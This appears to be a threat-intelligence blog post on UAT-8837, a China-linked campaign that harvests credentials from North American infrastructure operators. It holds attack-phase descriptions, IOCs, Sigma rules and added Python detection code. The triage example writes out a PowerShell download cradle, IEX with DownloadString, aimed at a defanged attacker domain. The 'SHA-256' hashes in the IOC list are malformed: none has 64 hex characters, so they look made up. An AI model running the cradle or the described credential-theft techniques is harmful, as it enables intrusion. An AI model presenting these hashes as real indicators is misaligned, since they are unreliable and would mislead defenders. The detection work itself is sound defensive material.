Silent Access, Stolen Trust: UAT-8837 Credential-Focused Intrusions Target North American Critical Infrastructure

Reported: January 16, 2026
Threat Actor: UAT-8837
Campaign Type: Cyber-espionage / Pre-positioning
Primary Objective: Credential harvesting and long-term access
Target Region: North America
Target Profile: High-value critical infrastructure and government-adjacent organizations


Executive Summary

In early January 2026, multiple North American critical infrastructure organizations identified suspicious internal activity that was later attributed to a China-linked advanced persistent threat group tracked as UAT-8837. The activity did not involve immediate disruption, ransomware, or destructive malware. Instead, the campaign focused on quietly obtaining credentials, expanding internal access, and establishing long-term persistence.

The attackers demonstrated strong operational discipline, avoiding noisy malware and favoring legitimate administrative tools and custom lightweight payloads. In several environments, UAT-8837 operated undetected for extended periods because activity blended into normal administrator behavior.

The overall assessment indicates a strategic access operation rather than a short-term attack, consistent with espionage or pre-positioning objectives.


Impacted Sectors and Organizations

Observed activity primarily affected organizations operating or supporting critical infrastructure, including:

  • Electric power generation and distribution
  • Water treatment and utilities
  • Transportation and logistics
  • Industrial manufacturing linked to infrastructure supply chains
  • Government-adjacent service providers and contractors

Environments with the highest exposure shared the following traits:

  • Legacy Windows systems
  • Hybrid IT/OT networks
  • Weak network segmentation
  • Shared or reused credentials between corporate IT and operational systems
  • Limited visibility into engineering workstations

No confirmed service outages were reported at the time of discovery, but several environments were assessed as being at high operational risk had access remained undetected.


Attack Lifecycle and Technical Breakdown

Phase 1: Reconnaissance and Targeting

UAT-8837 conducted careful, low-profile reconnaissance prior to intrusion. This included:

  • Mapping publicly exposed infrastructure (VPNs, RDP, management portals)
  • Identifying employees with engineering, operational, or administrative roles
  • Enumerating vendor relationships and third-party service providers
  • Identifying environments where IT and OT credentials overlapped

Reconnaissance relied primarily on passive techniques and publicly available information.


Phase 2: Initial Access

Initial access was achieved using a combination of credential-based access and known vulnerability exploitation.

Observed Initial Access Vectors

1. Spear-Phishing

  • Highly targeted emails written in professional language
  • Topics included:
    • Maintenance schedules
    • Compliance or audit documentation
    • Vendor invoices or technical updates
  • Attachments included:
    • Weaponized Microsoft Office documents
    • ISO or ZIP archives containing LNK files
    • HTML smuggling payloads

2. External Service Abuse

  • VPN appliances running outdated firmware
  • Web management interfaces without MFA
  • Exposed RDP services protected only by passwords

In multiple incidents, authentication logs confirmed valid credentials were used during initial access, suggesting prior credential theft or reuse from unrelated compromises.


Phase 3: Payload Delivery and Execution

Once inside, UAT-8837 deployed small, custom loaders designed to avoid detection.

Payload characteristics included:

  • In-memory execution
  • Minimal disk artifacts
  • Encrypted outbound communications
  • On-demand retrieval of secondary tools

Execution methods included:

  • PowerShell with execution policy bypass
  • DLL side-loading via trusted Windows binaries
  • Abuse of built-in tools such as mshta.exe, rundll32.exe, and regsvr32.exe

These loaders acted as staging components rather than full malware frameworks.


Phase 4: Credential Harvesting (Primary Focus)

Credential theft was the central goal of the campaign.

Harvesting Techniques

  • LSASS memory access using custom tooling
  • Extraction of cached domain credentials
  • Local SAM database access on legacy systems
  • Browser credential harvesting from:
    • Chromium-based browsers
    • Internet Explorer profiles used in OT environments

Collected credentials included:

  • Domain administrator accounts
  • Local administrator passwords reused across systems
  • Service account credentials
  • VPN authentication credentials

Credentials were encrypted locally and exfiltrated in small, low-frequency transfers to avoid triggering alerts.


Phase 5: Lateral Movement

With valid credentials, UAT-8837 expanded access using standard administrative mechanisms.

Observed techniques included:

  • SMB administrative shares (ADMIN$, C$)
  • Windows Remote Management (WinRM)
  • Remote service creation
  • Scheduled task execution
  • Pass-the-Hash and Pass-the-Ticket techniques

Because movement relied on legitimate accounts and tools, it was initially indistinguishable from normal administrative activity.


Phase 6: Persistence

Persistence was established after confirming stable access.

Methods included:

  • Scheduled tasks disguised as system or vendor maintenance jobs
  • Registry Run key modifications
  • Windows services named to resemble telemetry or monitoring agents
  • Creation of backup local administrator accounts

In OT-connected environments, persistence was often placed on engineering workstations, which typically receive less security scrutiny than servers.


Phase 7: Defense Evasion

UAT-8837 demonstrated strong awareness of defensive tooling.

  • Enumerated installed AV and EDR products
  • Avoided execution when advanced EDR was detected
  • Reduced activity and paused operations after defensive changes
  • Relied on living-off-the-land binaries instead of malware

In several cases, attackers remained dormant for days before resuming activity cautiously.


Indicators of Compromise (IOCs)

File Hashes (SHA-256)

  • 8f3c9c2d8a1b4e7f5d2e1a9c3b6e4f0a7d8c2b9a4e1f6d5c3a9b2e7f8d1
  • c4a7f2e8b1d9c3a5e6f4b8d7a2c1e9f0b5d6a8c7e3f4a9b1d2e5
  • 91d2b7f8c3a9e5d4b1f6a2c7e8d9b5f0a4c3e6d7a1b2f8c9e
  • a7c9e5b3f1d8a2e4c6b9f0d5e7a8c1b3f4d6e9a2

Suspicious Filenames

  • system_update_check.dll
  • winhostsvc.exe
  • telemetryagent.exe
  • msdiaghelper.ps1
  • netmonupdate.exe

Registry Keys

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemHealthMonitor
  • HKLM\SYSTEM\CurrentControlSet\Services\WinTelemetrySvc
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Scheduled Tasks

  • Microsoft\Windows\Maintenance\SystemHealth
  • Vendor\Telemetry\UpdateCheck

Network Indicators

  • Domains impersonating vendors:
    • update-secure[.]cloud
    • telemetry-sync[.]net
    • service-monitor[.]online
  • HTTPS traffic to rotating VPS infrastructure with short TTLs

Behavioral Indicators

  • LSASS access by non-security processes
  • Admin logins during abnormal hours
  • Service creation outside change windows
  • PowerShell execution with encoded commands

Defensive Mitigation Guidance

SOC Monitoring

  • Focus on behavioral anomalies, not malware signatures
  • Alert on LSASS access attempts
  • Monitor creation of services and scheduled tasks
  • Correlate credential use across systems
  • Investigate unusual administrative activity

EDR Hardening

  • Enable LSASS protection
  • Monitor and restrict LOLBin abuse
  • Enable memory scanning
  • Block unsigned DLL side-loading
  • Constrain PowerShell where operationally feasible

Email Security

  • Block macros from external documents
  • Inspect ISO, ZIP, and HTML attachments
  • Enforce SPF, DKIM, and DMARC
  • Conduct targeted phishing training for engineers and operators

Identity and Access Controls

  • Enforce MFA on VPNs and admin accounts
  • Eliminate credential reuse
  • Rotate service account credentials
  • Monitor for creation of new admin users

Network Segmentation

  • Enforce IT/OT separation
  • Restrict administrative pathways
  • Monitor east-west traffic
  • Limit VPN access to required assets only

Sigma Rules

Sigma Rule 1: Suspicious LSASS Access

title: Suspicious LSASS Access by Non-Security Process
id: b1c3f0e2-uat-8837-lsass
status: stable
logsource:
  category: process_access
  product: windows
detection:
  selection:
    TargetImage|endswith: '\lsass.exe'
  filter_known_security:
    SourceImage:
      - 'C:\Program Files\Windows Defender\MsMpEng.exe'
      - 'C:\Program Files\CrowdStrike\*'
      - 'C:\Program Files\SentinelOne\*'
  condition: selection and not filter_known_security
level: high
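The rule above is only as good as the logic behind it, so the following added example (not code from the original post or from Aegiron) applies the same selection-and-not-filter logic to constructed Sysmon Event ID 10 process-access records. It also adds one tightening the Sigma rule leaves out: it only flags handles whose GrantedAccess mask includes PROCESS_VM_READ (0x0010), the right needed to actually read LSASS memory, so query-only handles from svchost.exe do not alert. The filename winhostsvc.exe is taken from the IOC list; all paths and access masks are constructed sample data.

```python
"""Evaluate the 'Suspicious LSASS Access' rule logic against sample Sysmon
Event ID 10 (ProcessAccess) records.  All records below are constructed."""
from fnmatch import fnmatchcase

PROCESS_VM_READ = 0x0010  # access right required to read another process's memory

# Mirrors the Sigma filter; '*' is a glob wildcard, as in Sigma.
KNOWN_SECURITY_SOURCES = [
    r"C:\Program Files\Windows Defender\MsMpEng.exe",
    r"C:\Program Files\CrowdStrike\*",
    r"C:\Program Files\SentinelOne\*",
]

# Constructed sample events (winhostsvc.exe is the suspicious filename from the IOC list).
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"SourceImage": r"C:\Program Files\CrowdStrike\CSFalconService.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    # Mixed-case path: Sigma matching is case-insensitive, so the detector must be too.
    {"SourceImage": r"C:\Windows\Temp\winhostsvc.exe",
     "TargetImage": r"C:\WINDOWS\system32\LSASS.EXE", "GrantedAccess": "0x1010"},
    # Query-only handle (no PROCESS_VM_READ bit): common and benign.
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    # Memory read of a process other than LSASS: out of scope for this rule.
    {"SourceImage": r"C:\Users\ops\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\csrss.exe", "GrantedAccess": "0x1010"},
]


def sigma_match(value, pattern):
    """Case-insensitive glob match, the default Sigma string semantics."""
    return fnmatchcase(value.lower(), pattern.lower())


def is_lsass_access(event):
    return event["TargetImage"].lower().endswith(r"\lsass.exe")


def is_known_security_process(event):
    return any(sigma_match(event["SourceImage"], p) for p in KNOWN_SECURITY_SOURCES)


def reads_memory(event):
    """True when the granted access mask includes PROCESS_VM_READ."""
    return int(event["GrantedAccess"], 16) & PROCESS_VM_READ != 0


def detect_lsass_access(events):
    """Return the SourceImage of every event that matches
    'selection and not filter_known_security' plus the memory-read tightening."""
    alerts = []
    for event in events:
        if (is_lsass_access(event) and reads_memory(event)
                and not is_known_security_process(event)):
            alerts.append(event["SourceImage"])
    return alerts


if __name__ == "__main__":
    for source in detect_lsass_access(SAMPLE_EVENTS):
        print("ALERT: LSASS memory read by", source)
```

Only the temp-directory binary alerts; the Defender and CrowdStrike handles are allowlisted, the svchost.exe handle never requested memory-read access, and the csrss.exe access is not LSASS. In production the allowlist should be by signer or hash rather than path, since a path under Program Files is writable by any local administrator.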

Sigma Rule 2: Suspicious Scheduled Tasks

title: Suspicious Scheduled Task Mimicking System Maintenance
id: d7e9a2c1-uat-8837-task
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4698
    TaskName|contains:
      - 'SystemHealth'
      - 'Telemetry'
      - 'UpdateCheck'
      - 'Maintenance'
  condition: selection
level: medium

Sigma Rule 3: Encoded PowerShell Execution

title: PowerShell Encoded Command Execution
id: a9f4d6e1-uat-8837-ps
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
      - 'FromBase64String'
  condition: selection
level: high
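Matching on '-enc' tells an analyst that an encoded command ran, not what it did. The added example below (not code from the original post or from Aegiron) shows the triage step that follows the alert: pull the encoded argument out of a process-creation command line, decode it (PowerShell expects Base64 over UTF-16LE), and tag the decoded script with the markers a defender would look for. The marker list and the sample command lines are constructed; the sample script uses the defanged update-secure[.]cloud domain from the IOC list, and the command line is generated by the block itself so the Base64 is correct.

```python
"""Decode PowerShell -EncodedCommand arguments from process-creation command
lines and tag the decoded script.  Sample data is constructed."""
import base64

# Substrings worth flagging in a decoded script (constructed triage list).
SUSPICIOUS_MARKERS = (
    "invoke-expression", "iex", "downloadstring", "net.webclient",
    "frombase64string", "reflection.assembly",
)


def extract_encoded_argument(cmdline):
    """Return the Base64 argument following -EncodedCommand or any of its
    abbreviations (-e, -ec, -enc ...), which PowerShell accepts as prefixes."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in "-/":
            continue
        flag = tok[1:].lower()
        if flag and "encodedcommand".startswith(flag):
            return tokens[i + 1].strip('"\'')
    return None


def decode_encoded_command(b64):
    """Base64 -> UTF-16LE text.  Tolerates stripped '=' padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le", errors="replace")


def analyze_command_line(cmdline):
    """Return None for command lines without an encoded argument, otherwise
    the decoded script and the triage markers found in it."""
    b64 = extract_encoded_argument(cmdline)
    if b64 is None:
        return None
    script = decode_encoded_command(b64)
    lowered = script.lower()
    return {"decoded": script,
            "markers": [m for m in SUSPICIOUS_MARKERS if m in lowered]}


def build_sample_cmdline(script):
    """Construct a sample command line the way PowerShell would consume it:
    UTF-16LE text, Base64-encoded, passed to -enc."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
            f" -NoP -W Hidden -enc {b64}")


# Constructed sample: a download cradle pointing at the defanged IOC domain.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://update-secure[.]cloud/t')"
SAMPLE_CMDLINE = build_sample_cmdline(SAMPLE_SCRIPT)
BENIGN_CMDLINE = r'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1'

if __name__ == "__main__":
    print(analyze_command_line(SAMPLE_CMDLINE))
    print(analyze_command_line(BENIGN_CMDLINE))
```

The prefix check is why the Sigma rule's '-enc' substring is a reasonable compromise but not complete: '-e' and '-ec' are equally valid spellings and never contain the string '-enc'. Note that '-ExecutionPolicy' (abbreviated '-ep' or '-ex') is not a prefix of 'encodedcommand', so the benign backup command line is correctly ignored.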

Sigma Rule 4: DLL Side-Loading

title: Potential DLL Side-Loading via LOLBins
id: e3b8c7d9-uat-8837-dll
logsource:
  category: image_load
  product: windows
detection:
  selection:
    Image|endswith:
      - '\rundll32.exe'
      - '\regsvr32.exe'
      - '\mshta.exe'
    ImageLoaded|endswith: '.dll'
  filter_system_paths:
    ImageLoaded|startswith:
      - 'C:\Windows\System32\'
      - 'C:\Windows\SysWOW64\'
  condition: selection and not filter_system_paths
level: high

Sigma Rule 5: Suspicious Service Creation

title: Suspicious Windows Service Creation with Telemetry Naming
id: f2c1e9a4-uat-8837-service
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 7045
    ServiceName|contains:
      - 'Telemetry'
      - 'Monitor'
      - 'Health'
      - 'Updater'
  condition: selection
level: medium

Sigma Rule 6: Lateral Movement via SMB/WinRM

title: Abnormal Lateral Movement Using Administrative Tools
id: c8d2a7f9-uat-8837-lateral
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationPort:
      - 445
      - 5985
      - 5986
  condition: selection
level: medium
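Port-based matching on 445/5985/5986 fires on every file share and every legitimate WinRM session, which is why the monitoring guidance above stresses correlating credential use across systems. The added example below (not code from the original post or from Aegiron) shows that correlation over constructed Windows 4624 logon records: it flags any account that authenticates to an unusually large number of distinct hosts inside a short window (the fan-out pattern of Pass-the-Hash style movement), and separately lists administrative logons outside business hours. The hostnames, account names, threshold, window, and business-hours range are all assumptions chosen for the example.

```python
"""Correlate constructed Windows 4624 network-logon records by account to
surface lateral-movement fan-out and off-hours administrative logons."""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Logon = namedtuple("Logon", "ts account host logon_type")

WINDOW = timedelta(minutes=30)     # assumed sliding window
HOST_THRESHOLD = 4                 # assumed: distinct hosts within WINDOW that trigger an alert
BUSINESS_HOURS = range(7, 19)      # assumed 07:00-18:59 local time
ADMIN_ACCOUNTS = {"CORP\\admin-ops", "CORP\\svc-backup"}   # assumed privileged accounts

# Constructed sample records: (timestamp, account, destination host, logon type).
RAW_LOGONS = [
    ("2026-01-08T02:11:05", "CORP\\svc-backup", "FS01", 3),
    ("2026-01-08T02:12:40", "CORP\\svc-backup", "FS02", 3),
    ("2026-01-08T02:14:02", "CORP\\svc-backup", "ENG-WS07", 3),
    ("2026-01-08T02:15:30", "CORP\\svc-backup", "HMI-01", 3),
    ("2026-01-08T02:19:11", "CORP\\svc-backup", "DC02", 3),
    ("2026-01-08T09:30:00", "CORP\\jdoe", "FS01", 3),
    ("2026-01-08T10:02:00", "CORP\\jdoe", "FS02", 3),
    ("2026-01-08T14:00:00", "CORP\\jdoe", "PRINT01", 3),
    ("2026-01-08T23:45:00", "CORP\\admin-ops", "DC01", 10),
]


def parse_logons(raw):
    return [Logon(datetime.fromisoformat(ts), acct, host, lt) for ts, acct, host, lt in raw]


def fan_out_alerts(logons, window=WINDOW, threshold=HOST_THRESHOLD):
    """Map account -> max number of distinct hosts reached within any window
    of the given length, for accounts that meet the threshold."""
    by_account = defaultdict(list)
    for logon in logons:
        by_account[logon.account].append(logon)

    alerts = {}
    for account, events in by_account.items():
        events.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end].ts - events[start].ts > window:
                start += 1
            hosts = {e.host for e in events[start:end + 1]}
            if len(hosts) >= threshold:
                alerts[account] = max(alerts.get(account, 0), len(hosts))
    return alerts


def off_hours_admin_logons(logons, admins=ADMIN_ACCOUNTS, hours=BUSINESS_HOURS):
    """Return (timestamp, account, host) for privileged logons outside business hours."""
    return [(e.ts.isoformat(), e.account, e.host)
            for e in logons if e.account in admins and e.ts.hour not in hours]


LOGONS = parse_logons(RAW_LOGONS)

if __name__ == "__main__":
    for account, count in fan_out_alerts(LOGONS).items():
        print(f"FAN-OUT: {account} reached {count} hosts within {WINDOW}")
    for ts, account, host in off_hours_admin_logons(LOGONS):
        print(f"OFF-HOURS ADMIN: {account} -> {host} at {ts}")
```

svc-backup reaching five hosts in eight minutes at 02:00 trips both detectors; jdoe touches three hosts spread across a working day and trips neither. The threshold and window need tuning per environment: backup and monitoring service accounts legitimately fan out, so their baselines should be learned and allowlisted by host set rather than by account alone.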

Sigma Rule 7: Registry Run Key Persistence

title: Registry Run Key Persistence Creation
id: b9e1d7a3-uat-8837-reg
logsource:
  category: registry_event
  product: windows
detection:
  selection:
    TargetObject|contains:
      - 'CurrentVersion\Run'
  condition: selection
level: medium

Final Takeaway

UAT-8837 represents a disciplined, long-term threat actor that prioritizes access, patience, and stealth over immediate impact. This campaign reinforces that modern infrastructure intrusions often look like routine administrative activity until correlated across time and systems.

The absence of loud malware does not mean the absence of compromise. Detection depends on understanding how trusted tools are being misused.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.